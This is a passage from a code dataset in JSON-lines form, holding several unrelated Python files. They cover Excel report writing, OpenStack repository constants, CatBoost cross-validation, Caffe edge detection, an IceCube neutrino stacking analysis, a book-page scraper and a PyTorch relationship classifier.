column=2).border\n # print('边框样式')\n # print(Border_1)\n\n # 靠右缩进\n Alignment_1 = Alignment(horizontal=None, vertical=None, textRotation=0, wrapText=None, shrinkToFit=None, indent=0.0, relativeIndent=0.0, justifyLastLine=None, readingOrder=0.0)\n # 居中缩进\n Alignment_2 = Alignment(horizontal='center', vertical='center', textRotation=0, wrapText=True, shrinkToFit=None, indent=0.0, relativeIndent=0.0, justifyLastLine=None, readingOrder=0.0)\n # print('缩进样式')\n # print(Alignment_1)\n\n\n a = 3\n for bug in bugs:\n ws_bug.delete_rows(a)\n ws_bug.cell(row=a, column=1).value = '日常业务'\n ws_bug.cell(row=a, column=1).font = font_1\n ws_bug.cell(row=a, column=1).alignment = Alignment_2\n ws_bug.cell(row=a, column=1).border = Border_1\n\n ws_bug.cell(row=a, column=2).value = '批量做账'\n ws_bug.cell(row=a, column=2).font = font_1\n ws_bug.cell(row=a, column=2).alignment = Alignment_2\n ws_bug.cell(row=a, column=2).border = Border_1\n\n ws_bug.cell(row=a, column=5).value = VersionID\n ws_bug.cell(row=a, column=5).font = font_1\n ws_bug.cell(row=a, column=5).alignment = Alignment_2\n ws_bug.cell(row=a, column=5).border = Border_1\n\n ws_bug.cell(row=a, column=6).value = '否'\n ws_bug.cell(row=a, column=6).font = font_1\n ws_bug.cell(row=a, column=6).alignment = Alignment_2\n ws_bug.cell(row=a, column=6).border = Border_1\n\n ws_bug.cell(row=a, column=7).value = '无'\n ws_bug.cell(row=a, column=7).font = font_1\n ws_bug.cell(row=a, column=7).alignment = Alignment_2\n ws_bug.cell(row=a, column=7).border = Border_1\n\n ws_bug.cell(row=a, column=8).value = bug['需求提出方']\n ws_bug.cell(row=a, column=8).font = font_1\n ws_bug.cell(row=a, column=8).alignment = Alignment_2\n ws_bug.cell(row=a, column=8).border = Border_1\n\n ws_bug.cell(row=a, column=9).value = bug['任务编号']\n ws_bug.cell(row=a, column=9).font = font_1\n ws_bug.cell(row=a, column=9).alignment = Alignment_2\n ws_bug.cell(row=a, column=9).border = Border_1\n a += 1\n\n ws_task = wb.worksheets[2]\n a = 3\n for task in tasks:\n ws_task.delete_rows(a)\n\n ws_task.cell(row=a,column= 1).value = '日常业务'\n ws_task.cell(row=a, column= 1).font = font_1\n ws_task.cell(row=a, column= 1).alignment = Alignment_2\n ws_task.cell(row=a, column= 1).border = Border_1\n\n ws_task.cell(row=a,column= 2).value = '批量做账'\n ws_task.cell(row=a, column= 2).font = font_1\n ws_task.cell(row=a, column= 2).alignment = Alignment_2\n ws_task.cell(row=a, column= 2).border = Border_1\n\n ws_task.cell(row=a,column= 4).value = '否'\n ws_task.cell(row=a, column= 4).font = font_1\n ws_task.cell(row=a, column= 4).alignment = Alignment_2\n ws_task.cell(row=a, column= 4).border = Border_1\n\n ws_task.cell(row=a,column= 5).value = '无'\n ws_task.cell(row=a, column= 5).font = font_1\n ws_task.cell(row=a, column= 5).alignment = Alignment_2\n ws_task.cell(row=a, column= 5).border = Border_1\n\n ws_task.cell(row=a,column= 6).value = task['需求提出方']\n ws_task.cell(row=a, column= 6).font = font_1\n ws_task.cell(row=a, column= 6).alignment = Alignment_2\n ws_task.cell(row=a, column= 6).border = Border_1\n\n ws_task.cell(row=a,column= 7).value = task['需求编号']\n ws_task.cell(row=a, column= 7).font = font_1\n ws_task.cell(row=a, column= 7).alignment = Alignment_2\n ws_task.cell(row=a, column= 7).border = Border_1\n\n a += 1\n book_path = strLocalFolder + r'\\估值_'+VersionID+r'升级说明-相泽峰 .xlsx'\n wb.save(book_path)\n\n\n\n\ndef main():\n global VersionID\n print(strDes)\n VersionID = input('请输入版本号:')\n _init()\n data=[]\n data.append(read_excel()[0])\n data.append(read_excel()[1])\n write_excel(data[1],data[0])\n\nif __name__ == '__main__':\n main()","sub_path":"release/excel_mate -原始版本.py","file_name":"excel_mate -原始版本.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"446649588","text":"# Copyright 2020 Red Hat, Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\n\nRHOS_VERSIONS_SEARCH_PATHS = [\n \"/usr/share/rhos-bootstrap\",\n \"/usr/local/share/rhos-bootstrap\",\n os.path.join(sys.prefix, \"share\", \"rhos-bootstrap\"),\n]\n\nYUM_REPO_BASE_DIR = \"/etc/yum.repos.d\"\n\nDEFAULT_MIRROR_MAP = {\n \"fedora\": \"https://mirrors.fedoraproject.org\",\n \"centos\": \"http://mirror.centos.org\",\n \"ubi\": \"http://mirror.centos.org\",\n \"rhel\": \"https://trunk.rdoproject.org\",\n \"rdo\": \"https://trunk.rdoproject.org\",\n}\n\nCENTOS_RELEASE_MAP = {\"centos8\": \"8\", \"centos8-stream\": \"8-stream\"}\n\nCENTOS_REPO_MAP = {\n \"baseos\": \"BaseOS\",\n \"appstream\": \"AppStream\",\n \"highavailability\": \"HighAvailability\",\n \"nfv\": \"nfv\",\n \"powertools\": \"PowerTools\",\n \"rt\": \"RT\",\n \"virt\": \"virt\",\n}\n\nSUPPORTED_REPOS = [\n \"ansible\",\n \"ceph\",\n \"delorean\",\n \"openstack\",\n \"openvswitch\",\n \"satellite\",\n \"virt\",\n]\n","sub_path":"rhos_bootstrap/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"41587231","text":"# author: Heo Sung Wook\n\nimport catboost as cbt\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\ndef cbt_cv_predict(data, new_data, params, iterations, cv, valid_prop, target, isReg, eval_metric=\"AUC\", stopping_tolerance=0.01, stopping_rounds=10):\n # check where Regression or not\n if isReg == True:\n mdl = cbt.CatBoostRegressor(use_best_model=True,\n iterations=iterations,\n eval_metric=eval_metric,\n od_type=\"Iter\",\n od_pval=stopping_tolerance,\n od_wait=stopping_rounds,\n random_seed=1234)\n else:\n mdl = cbt.CatBoostClassifier(use_best_model=True,\n iterations=iterations,\n eval_metric=eval_metric,\n od_type=\"Iter\",\n od_pval=stopping_tolerance,\n od_wait=stopping_rounds,\n random_seed=1234)\n \n predsTest = 0\n for i in range(0, cv): \n # Prepare the data set for fold\n trainData, validData = train_test_split(data, \n test_size=valid_prop, \n stratify=data[target], \n random_state = (i+1)) \n \n \n trainLabel = trainData[target]\n trainData.drop(target, axis = 1, inplace = True)\n \n validLabel = validData[target]\n validData.drop(target, axis = 1, inplace = True)\n \n # for specifying index of categorical columns\n categorical_features_indices = np.where((trainData.dtypes == \"category\") | (trainData.dtypes == \"object\"))[0]\n \n \n ml_cbt = mdl.fit(X=trainData, \n y=trainLabel, \n cat_features=categorical_features_indices,\n eval_set=(validData, validLabel),\n verbose=False,\n plot=False)\n \n # Predict\n predsTest += ml_cbt.predict(new_data)/cv\n\n return ml_cbt, predsTest\n\n\n\"\"\"\n##### example #####\n## after run \"tuneCBT.py\" example code \n\n\ncbt_model, pred = cbt_cv_predict(data = train, \n new_data = test,\n params = bestParams, \n iterations = 1000, \n cv = 12,\n isReg = False,\n valid_prop = 0.4, \n target = \"Survived\",\n stopping_rounds = 50)\n\"\"\"","sub_path":"Kaggle/mlmc/Python/CatBoost/cbt_cv_predict.py","file_name":"cbt_cv_predict.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"312121638","text":"import numpy as np\nimport scipy.misc\nimport Image\nimport os\nimport cv2\nimport skimage.exposure as exposure\n\n# Make sure that caffe is on the python path:\ncaffe_root = '../../' # this file is expected to be in {caffe_root}/examples/hed/\nimport sys\nsys.path.insert(0, caffe_root + 'python')\n\nimport caffe\n\n# data_root = '../../data/HED-BSDS/'\ndata_root = '../../data/'\nwith open(data_root+'test.lst') as f:\n test_lst = f.readlines()\n \ntest_lst = [data_root+x.strip() for x in test_lst]\n\nim_lst = []\nfor i in range(0, len(test_lst)):\n im = Image.open(test_lst[i])\n # in_ = np.array(im, dtype=np.uint8)\n in_ = np.array(im, dtype=np.float32)\n if in_.shape[2]>3:\n in_ = in_[:,:,:3] # remove alpha channel\n in_ = in_[:,:,::-1] # rgb to bgr\n # in_=exposure.equalize_adapthist(in_, kernel_size=None, clip_limit=0.2, nbins=64) # enhance\n in_ = in_/np.max(in_)*255.0\n in_ -= np.array((104.00698793,116.66876762,122.67891434))\n im_lst.append(in_)\n\nidx = 3\nin_ = im_lst[idx]\nin_ = in_.transpose((2,0,1)) # HWC to CHW\n#remove the following two lines if testing with cpu\n# caffe.set_mode_gpu()\n# caffe.set_device(0)\n# load net\nmodel_root = './'\nnet = caffe.Net(model_root+'deploy.prototxt', model_root+'hed_pretrained_bsds.caffemodel', caffe.TEST)\n# shape for input (data blob is N x C x H x W), set data\nnet.blobs['data'].reshape(1, *in_.shape)\nnet.blobs['data'].data[...] = in_\n# run net and take argmax for prediction\nnet.forward()\nout1 = net.blobs['sigmoid-dsn1'].data[0][0,:,:]\nout2 = net.blobs['sigmoid-dsn2'].data[0][0,:,:]\nout3 = net.blobs['sigmoid-dsn3'].data[0][0,:,:]\nout4 = net.blobs['sigmoid-dsn4'].data[0][0,:,:]\nout5 = net.blobs['sigmoid-dsn5'].data[0][0,:,:]\nfuse = net.blobs['sigmoid-fuse'].data[0][0,:,:]\n\nmerge = (out1+out2+out3+out4+out5+fuse)/6.0\nprint(np.max(merge))\ncv2.imwrite(test_lst[idx][:-4]+\"-res.png\",merge/np.max(merge)*255)\ncv2.imwrite(test_lst[idx][:-4]+\"-res-out3.png\",out3/np.max(out3)*255)\n\n\n# process the watershed\nfrom skimage.morphology import watershed, disk\nfrom scipy import ndimage as ndi\nbd = int(out3.shape[1]/20)\nout3[:,:bd] = 0\nout3[:,-bd:-1] = 0\nmarkers = out3 < 0.05 # 0.05\nmarkers = ndi.label(markers)[0]\nlabels = watershed(out3, markers)\ncv2.imwrite(test_lst[idx][:-4]+\"-label.png\",labels)\n\n# binary processing\nuniq = np.unique(labels[:,-1],return_counts=True)\nbg = uniq[0][np.argmax(uniq[1])]\nbinary = 255*(labels!=bg)\ncv2.imwrite(test_lst[idx][:-4]+\"-bin.png\",binary)\n\n# scale_lst = [fuse]\n# plot_single_scale(scale_lst, 22)\n# scale_lst = [out1, out2, out3, out4, out5]\n# plot_single_scale(scale_lst, 10)\n","sub_path":"examples/hed/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"608262493","text":"import ah_db\nimport sys,traceback\nsys.path.append( '/opt/services/activehours/python-services')\nfrom modeling.feature.feature_generic import FeatureGeneric\n\n\nclass EmploymentFeature(FeatureGeneric):\n nWkMax=20\n\n def buildFeatures(self,predTime):\n f={}\n try:\n lastIndex=self.getDataRangeIndex(predTime)\n\n f['nUserEmployment']=lastIndex+1 #len(self.data) #should normalize by wksincesignup\n f['daySinceLastEmployment']=EmploymentFeature.nWkMax*7\n\n\n f['employer']=-1\n f['paytypeid']=-1\n f['nEmployer']=0\n if lastIndex>=0:\n f['employer']=self.data[lastIndex]['employerid']\n f['paytypeid']=self.data[lastIndex]['paytypeid']\n\n try:\n f['daySinceLastEmployment']=(predTime-self.data[lastIndex]['CreatedOn']).days\n except:\n f['daySinceLastEmployment']=EmploymentFeature.nWkMax*7\n\n\n employer={}\n\n\n for i in range(lastIndex+1):\n l=self.data[i]\n\n employer[l['employerid']]=1\n\n\n f['nEmployer']=len(employer)\n except:\n print(lastIndex,self.data)\n traceback.print_exc()\n\n self.reName(f,'employment_')\n return f\n\n def getData(self):\n sql='''\n SELECT userid, employerid, paytypeid,\n LastUpdatedOn AS CreatedOn\n FROM UserEmploymentDetails\n WHERE userid=%s\n ORDER BY LastUpdatedOn\n '''\n\n return ah_db.execute_to_json('miscellaneous', sql, (self.uid,))\n","sub_path":"src/modeling/feature/feature_employment.py","file_name":"feature_employment.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"327066965","text":"import json\nimport ast\n\n\nclass Preference:\n \"\"\"\n Retrieves or return user preferences.\n the information is stored in a file named \"preferences.txt\"\n \"\"\"\n\n @staticmethod\n def get_all_pref():\n with open('preference.txt', 'rb') as doc_read:\n dictionary = json.loads(doc_read.read().decode('utf-8'))\n return dictionary\n\n def get_pref(self, pref):\n dictionary = self.get_all_pref()\n if dictionary[pref] == \"\":\n return\n else:\n return dictionary[pref]\n\n @staticmethod\n def reset_pref():\n result = ['Default folder', 'Delete folder']\n for a in result:\n Preference().set_pref(a, '')\n\n def set_pref(self, pref, value):\n value = value.strip()\n dictionary = self.get_all_pref()\n dictionary[pref] = value\n with open('preference.txt', 'wb') as doc_write:\n dic_str = json.dumps(dictionary).encode('utf-8')\n doc_write.write(bytes(dic_str))\n\n @staticmethod\n def get_extension():\n list_data = []\n return list_data\n\n @staticmethod\n def change_extension(list_data):\n \"\"\"\n :param list_data: a retrieved data list\n \"\"\"\n with open('extbis.txt', 'rb') as extension_dict :\n dictionary = ast.literal_eval(extension_dict.read().decode())\n for element in list_data:\n dictionary[element[0]] = (element[1], element[2], element[3])\n dictionary = json.dumps(dictionary).encode('utf-8')\n with open('extbis.txt', 'wb') as extension_dict_2:\n extension_dict_2.write(bytes(dictionary))\n","sub_path":"Parameters/preference.py","file_name":"preference.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"38243153","text":"#!/cvmfs/icecube.opensciencegrid.org/py3-v4/RHEL_7_x86_64/bin/python\n\nimport os, time\n#CSKY IMPORTS\nimport csky as cy\nfrom csky.hyp import PowerLawFlux\nfrom csky.utils import Arrays\n#OTHER IMPORTS\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport histlite as hl\nfrom astropy.time import Time\nimport random\nimport argparse\n\n################################################################################\n# DEFINITIONS\n################################################################################\ndef Write2File(msg,logfile):\n if logfile!=\"\":\n log = open(logfile, \"a\")\n log.write(msg+\"\\n\")\n log.close()\n else:\n print(\"WARNING: File path empty, nothing is written\")\n return\n\ndef computing_fluxes_from_ns(trials,sens_disc_arr,pivot_energy,units):\n ednde = trials.to_dNdE(sens_disc_arr['n_sig'], E0=pivot_energy, unit=units)\n ednde_err = trials.to_dNdE(sens_disc_arr['n_sig_error'], E0=pivot_energy, unit=units)\n e2dnde = trials.to_E2dNdE(sens_disc_arr['n_sig'], E0=pivot_energy, unit=units)\n e2dnde_err = trials.to_E2dNdE(sens_disc_arr['n_sig_error'], E0=pivot_energy, unit=units)\n return ednde,ednde_err,e2dnde,e2dnde_err\n################################################################################\n# INPUT SECTION\n################################################################################\n#############\n# ARGUMENTS #\n#############\np = argparse.ArgumentParser(description=\"Calculates Sensitivity and Discovery\"\n \" Potential Fluxes for the MOJAVE AGN Radio stacking analysis\",\n formatter_class=argparse.RawTextHelpFormatter)\np.add_argument(\"--pivot_energy\", default=100.0, type=float,\n help=\"Pivot energy in TeV (E0) (default=100.0)\")\np.add_argument(\"--index\", default=2.0, type=float,\n help=\"Spectral Index (default=2.0)\")\np.add_argument(\"--wrkdir\", default=\"result_dir\", type=str,\n help=\"Output directory (default:result_dir)\")\np.add_argument(\"--equal_weights\", default=False, \n help=\"Equal weights for stacking? If no then average fluxes are used. (default:False)\")\np.add_argument(\"--nscramble\", default=1000, type=int,\n help=\"Number of background only scrambles used \"\n \"to measure TS distribution (default=1000)\")\np.add_argument(\"--nsample\", default=100, type=int,\n help=\"Batch size for sensitivity and discovery potential calculation \")\np.add_argument(\"--make_background_plot\", default=False,\n help=\"Make plot of background trials (defaut:False)\")\np.add_argument(\"--inj_energy\", default=\"1e0_1e1\", type=str, \n help=\"Energy bin in TeV to use for computing differential sensitivity in form of string 1e0_1e1 (default)\")\np.add_argument(\"--nstep\", default=5, type=int,\n help=\"Number of signal injection steps (default=5)\")\np.add_argument(\"--input_file\", default=\"../MOJAVE_multiyear_complete_sample.txt\", type=str,\n help=\"Location of input file: MOJAVE_multiyear_complete_sample.txt\")\np.add_argument(\"--ana_dir_path\", default=\"../cache/\", type=str,\n help=\"Location of analysis directory. (Default:../cache/)\")\np.add_argument(\"--discovery_thresh\", default=5, type=float,\n help=\"Discovery threshold in sigma (default=5)\")\np.add_argument(\"--cpus_used\",default = 2, type=int,help = 'number of cpus to be used (default 2)')\n\nargs = p.parse_args()\n#############\n# ARGUMENTS #\n############# \npivot_energy = args.pivot_energy\nindex = args.index\nwrkdir = args.wrkdir\nequal_weights = args.equal_weights\nnscramble = args.nscramble\nnsample = args.nsample\nmake_background_plot =args.make_background_plot\ninj_energy = args.inj_energy\nnstep = args.nstep\ninput_file = args.input_file\nana_dir_path = args.ana_dir_path\ndiscovery_thresh = args.discovery_thresh\ncpus_used = args.cpus_used\n\nif not os.path.exists(wrkdir):\n os.makedirs(wrkdir)\nGeV = 1. # base SkyLab and csky energy units are in GeV mostly\nTeV = 1000*GeV \nE0 = pivot_energy*TeV # pivot energy \ninj_enj_lo = (float(inj_energy[:3]))*TeV # inj energy LL\ninj_enj_hi = (float(inj_energy[4:]))*TeV # inj energy UL \nprint(\"Min max inj energy in GeV\")\nprint(inj_enj_lo,inj_enj_hi)\n\n################################################################################\n# GET MOJAVE DATA SET (NAME RA DEC av_flux pk_flux)SET Directory\n################################################################################\narray = np.loadtxt(input_file,dtype='str')\nsrc_name = np.asarray(array[:,0])\nsrc_ra = np.asarray(array[:,1],dtype=float)*np.pi/180\nsrc_dec = np.asarray(array[:,2],dtype=float)*np.pi/180\nflux_used = np.asarray(array[:,3],dtype=float)\nprint(\"---------------------------------------------------------\\n\")\nprint(\"Number of sources used in stacking: %s\"%(len(flux_used)))\nprint(\"---------------------------------------------------------\\n\")\nno_of_sources = len(flux_used)\n\n################################################################################\n# Weights!\n################################################################################\nif equal_weights:\n wt = np.ones(len(flux_used))\nelse:\n wt = np.copy(flux_used)\nwt=wt/np.sum(wt)\nprint(\"\\n WEIGHTS USED FOR THIS RUN:\\n %s \\n\"%(wt))\n\n################################################################################\n# CSKY SETUP and LOAD ICECUBE DATA\n################################################################################\nana_dir = cy.utils.ensure_dir(ana_dir_path)\nrepo = cy.selections.repo\nana = cy.get_analysis(cy.selections.repo, cy.selections.PSDataSpecs.ps_10yr, dir=ana_dir)\nif(os.path.isdir(ana_dir)==True):\n print(\"Not saving analysis cache as folder exists\")\nelse:\n print(\"Saving analysis cache to \",ana_dir)\n ana.save(ana_dir)\ncy.CONF['ana'] = ana\ncy.CONF['mp_cpus'] = cpus_used\n\n################################################################################\n# CSKY SOURCE DESCRIPTION\n################################################################################\nsrc = cy.utils.Sources(ra=src_ra,dec=src_dec,weight=wt,deg=False)\nflux = cy.hyp.PowerLawFlux(gamma=index,norm=E0,energy_range=(inj_enj_lo,inj_enj_hi))\n\n################################################################################\n# SET UP TRIAL RUNNER\n################################################################################\ntimer = cy.timing.Timer()\ntime = timer.time\nwith time('trial runner construction'):\n tr = cy.get_trial_runner(src=src, ana=ana,flux=flux, sindec_bandwidth=np.radians(.1), mp_cpus=cpus_used)\n\n################################################################################\n# BACKGROUND\n################################################################################\nbkgfile_comb= wrkdir+\"/bkg_files/background_for_index_%s_energy_inj_%s.npy\"%(index,energy_inj)\nif(os.path.isfile(bkgfile_comb)==True):\n bg_arr=np.load(bkgfile_comb)\n bg = cy.dists.Chi2TSD(cy.utils.Arrays(init=bg_arr))\nelse:\n print(\"computing background:\")\n bg_arr = tr.get_many_fits(nscramble, seed=random.randint(1, 1000))\n bg = cy.dists.Chi2TSD(bg_arr)\n np.save(bkgfile_comb,bg_arr.as_array)\nprint(bg.description)\n \nif make_background_plot:\n fig, ax = plt.subplots()\n h = bg.get_hist(bins=30)\n hl.plot1d(ax, h, crosses=True, label='{} bg trials'.format(bg.n_total))\n x = h.centers[0]\n norm = h.integrate().values\n ax.semilogy(x, norm * bg.pdf(x), lw=1, ls='--',label=r'$\\chi^2[{:.2f}\\ dof,\\ \\eta={:.3f}]$'.format(bg.ndof, bg.eta))\n\n ax.set_xlabel(r'TS')\n ax.set_ylabel(r'number of trials')\n ax.legend()\n plt.tight_layout()\n plt.savefig(wrkdir+\"background_plot_for_index_%s_energy_bin_%s.png\"%(index,energy_inj))\n\n################################################################################\n# SENSITIVITY\n################################################################################\nsens = tr.find_n_sig(\n bg.median(), 0.9, #90%\n n_sig_step=nstep,\n batch_size=nsample,\n max_batch_size=nsample,\n tol=0.05 #Change tolerance if required\n )\n\n \ne_mid=10**((math.log((inj_enj_lo/1000),10)+math.log((inj_enj_hi/1000),10))/2)\n\nednde,ednde_err,e2dnde,e2dnde_err = computing_fluxes_from_ns(tr,sens,e_mid,1e3)\nprint(\"\\nSensitivity Flux in TeV/cm2/s @ %s TeV:\"%(E0/TeV))\nprint(e2dnde,\"+-\",e2dnde_err)\n\n\n# SAVE RESULTS TO COMMON FILE\n# Column names E_range gamma e_norm sensflux(e2dnde)calc sensflux(e2dnde)err\nout_line=\"%s\\t%s\\t%s\\t%.2e\\t%.2e\\t%s\"%(energy_inj,index,e_mid,e2dnde,e2dnde_err,\"TeV/cm2/s\")\ncombresult_file= wrkdir+\"/sens_combined_result_file_index_%s.txt\"%(index)\nif(os.path.isfile(combresult_file)!=True):\n Write2File(\"E_range\\tgamma\\te_norm\\tsensflux(E2dnde)calc\\tsensflux(E2dnde)err\",combresult_file)\nWrite2File(out_line,combresult_file)\n\n################################################################################\n# DISCOVERY POTENTIAL\n################################################################################ \ndisc = tr.find_n_sig(bg.isf_nsigma(discovery_thresh), \n 0.5, #50%\n n_sig_step=nstep, \n batch_size=nsample, \n tol=0.05) #Change tolerance if required\n\n\nednde,ednde_err,e2dnde,e2dnde_err = computing_fluxes_from_ns(tr,disc,e_mid,1e3)\nprint(\"\\n DP Flux in TeV/cm2/s @ %s TeV:\"%(E0/TeV))\nprint(e2dnde,\"+-\",e2dnde_err)\n\n\n# SAVE RESULTS TO COMMON FILE\n# Column names E_range gamma e_norm dpflux(e2dnde)calc dpflux(e2dnde)err\n \nout_line=\"%s\\t%s\\t%s\\t%.2e\\t%.2e\\t%s\"%(energy_inj,index,e_mid,e2dnde,e2dnde_err,\"TeV/cm2/s\")\ncombresult_file=wrkdir+ \"/dp_combined_result_file_index_%s.txt\"%(index)\nif(os.path.isfile(combresult_file)!=True):\n Write2File(\"E_range\\tgamma\\te_norm\\tdpflux(E2dnde)calc\\tdpflux(E2dnde)err\",combresult_file)\nWrite2File(out_line,combresult_file)\n","sub_path":"differential_sensitivity_discovery_potential/mojave_time_independent_analysis_variable_einj.py","file_name":"mojave_time_independent_analysis_variable_einj.py","file_ext":"py","file_size_in_byte":9911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"590457287","text":"from collections import namedtuple\n\nfrom scraper.book_scraper import BookScraper\nfrom utils.date_handler import DateHandler\nfrom utils.manning_string_handler import ManningStringHandler\n\nMeapBookDetails = namedtuple('MeapBookDetails', ['isbn',\n 'author_list',\n 'price',\n 'num_pages',\n 'forum_url',\n 'thumbnail_url',\n # Only meap book\n 'meap_began_month_year',\n 'estimated_publication_month_year',\n 'percent_done'])\n\n\nclass MeapBookScraper(BookScraper):\n\n def __init__(self, url):\n super(MeapBookScraper, self).__init__(url)\n\n def get_book_details(self):\n meap_book_details = MeapBookDetails(\n isbn=self._get_isbn(),\n author_list=self._get_author_list(),\n price=self._get_price_list(),\n num_pages=self._get_num_pages(),\n forum_url=self._get_forum_url(),\n thumbnail_url=self._get_thumbnail_url(),\n # Only published book\n meap_began_month_year=self._get_meap_began_month_year(),\n estimated_publication_month_year=self._get_estimated_publication_month_year(),\n percent_done=self._get_percent_done()\n )\n return meap_book_details\n\n def _get_estimated_publication_month_year(self):\n for line in self._product_info:\n if ManningStringHandler.get_estimated_publication_month_year_in(line):\n return ManningStringHandler.get_estimated_publication_month_year_in(line)\n\n def _get_meap_began_month_year(self):\n for line in self._product_info:\n if ManningStringHandler.get_meap_began_month_year_in(line):\n return DateHandler.convert_month_year_string_to_date(ManningStringHandler.get_meap_began_month_year_in(line))\n\n def _get_percent_done(self):\n if self._beautiful_soup_object.find('div', {'class': 'progress-bar progress-bar-success'}):\n return int(self._beautiful_soup_object.find('div', {'class': 'progress-bar progress-bar-success'}).attrs[\n 'aria-valuenow'])\n","sub_path":"manning/scraper/meap_book_scraper.py","file_name":"meap_book_scraper.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"412437379","text":"# E.g.\n# \tpython e2e_runner.py --geom '100 100 100 100 1000 700 ; ; 1700 800 300 70' --lr 0.001\n\nshared = __import__(__package__ or '__init__')\n\n\nimport sys\nimport os\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch.utils.data.sampler as sampler\n\nimport dataset.faster_rcnn as data\nimport unrel.unrel_model as unrel\nimport classifier.generic_solver as generic_solver\nimport classifier.classifier as cls\nfrom classifier.loss_calculator import LossCalculator\n\nimport pdb\n\nparser = shared.parser\nparser.add_option('--bp_every', dest='backprop_every', default=64, type='int') # Don't backprop on every 'batch'. Instead backprop after multiple batches.\nparser.add_option('--nowt', dest='weighted_loss', action='store_false', default=True)\nassert parser.has_option('--lr')\nparser.defaults['batch_size'] = 0.00001\nassert parser.has_option('--bs')\nparser.defaults['batch_size'] = 1\nassert parser.has_option('--tbs')\nparser.defaults['test_batch_size'] = 1\nassert parser.has_option('--outdir')\nparser.defaults['outdir'] = 'log/e2e/vgg16'\nassert parser.has_option('--geom')\nparser.defaults['geometry'] = '1400 600 300 70'\nassert parser.has_option('--test_every')\nparser.defaults['test_every'] = 1024\n\nclass Model(unrel.Model):\n\tdef __init__(self, n_vis_features, *args, **kwargs):\n\t\tsuper(Model, self).__init__(*args, **kwargs)\n\t\tself.classifier = nn.Sequential(*(list(self.classifier.children())[:-1] + [nn.Linear(4096, n_vis_features)])) # Replace last layer of classifier for our desired output dimension\n\t\tgeom = [ int(x) for x in kwargs['opts'].geometry.split() ]\n\t\tself.apperance_normalizer = nn.BatchNorm1d( 500 )\n\t\tself.predicate_classifier = cls.sequential( geom, batchnorm=False )\n\n\tdef forward(self, batch):\n\t\tappearance_features = super(Model, self).forward(batch)\n\t\tif appearance_features.dim() < 2:\n\t\t\tprint('Uh oh. Weird appearance features batch %s' % (str(appearance_features.shape),))\n\t\t\tappearance_features.unsqueeze_(0)\n\t\tappearance_features = self.apperance_normalizer( appearance_features )\n\t\t# Get spatial features\n\t\tspatial_features = batch['spatial'].float().cuda()\n\t\tif len(spatial_features.shape) > 2: spatial_features.unsqueeze_(0) # kludge. find out why dimensions are inconsistent\n\t\t# Concatenate apperance and spatial features => visual features\n\t\tvisual_features = torch.cat( [spatial_features, appearance_features[0::2,:], appearance_features[1::2,:]], 1 )\n\t\t# Compute predicate prediction\n\t\tpredicate_scores = self.predicate_classifier(visual_features)\n\t\treturn predicate_scores\n\n\nclass Solver(generic_solver.GenericSolver):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(Solver, self).__init__(*args, **kwargs)\n\t\tself.verbose = False\n\t\tself.optimizer.zero_grad()\n\t\tself.batch_example_ct = 0\n\n\tdef _train_step(self, batch):\n\t\tself.model.train()\n\t\tloss = self.train_loss(batch)\n\t\tloss.backward()\n\t\tself.batch_example_ct += batch['preds'].shape[0]\n\t\tif self.batch_example_ct >= self.opts.get('backprop_every'): # If this is not the first iteration and we have enough iterations to merit a backprop\n\t\t\tself.optimizer.step()\n\t\t\tself.optimizer.zero_grad()\n\t\t\tself.batch_example_ct = 0\n\t\tif self.iteration % self.print_every == 0:\n\t\t\tself._print('TRAIN_BCH', self.train_loss.end_batch())\n\t\tif self.scheduler and testloader is None:\n\t\t\tself.scheduler.step(loss.item())\n\t\treturn loss\n\nclass Runner(shared.Runner):\n\tdef setup_model(self):\n\t\tsuper(Runner, self).setup_model()\n\t\tself.model.cuda()\n\n\tdef _build_model(self, n_vis_features=500):\n\t\tprint('Building model')\n\t\treturn Model(n_vis_features, opts=self.opts)\n\n\tdef setup_opt(self, optimizer_lambda=None, scheduler_lambda=None, solver_lambda=None):\n\t\t# Define optimizer, scheduler, solver\n\t\tif self.optimizer == None:\n\t\t\tprint('Building optimizer...')\n\t\t\tself.optimizer = optimizer(self.model.parameters(), self.opts) if optimizer_lambda else torch.optim.Adam(self.model.parameters(), lr=self.opts.lr)\n\t\tif self.scheduler == None and not self.opts.no_scheduler:\n\t\t\tprint('Building scheduler...')\n\t\t\tself.scheduler = scheduler_lambda(self.optimizer) if scheduler_lambda else torch.optim.lr_scheduler.MultiStepLR(self.optimizer, [x * self.opts.backprop_every for x in [35, 75, 120, 200, 400, 600, 800]], 0.5)\n\t\tif self.solver == None:\n\t\t\tprint('Building solver...')\n\t\t\tif solver_lambda:\n\t\t\t\tself.solver = solver_lambda(self.model, self.optmizer, self.scheduler, loss_calculator, self.opts.__dict__)\n\t\t\telse:\n\t\t\t\tif self.opts.weighted_loss:\n\t\t\t\t\tprint('Using weighted loss...')\n\t\t\t\t\tpred_klasses = 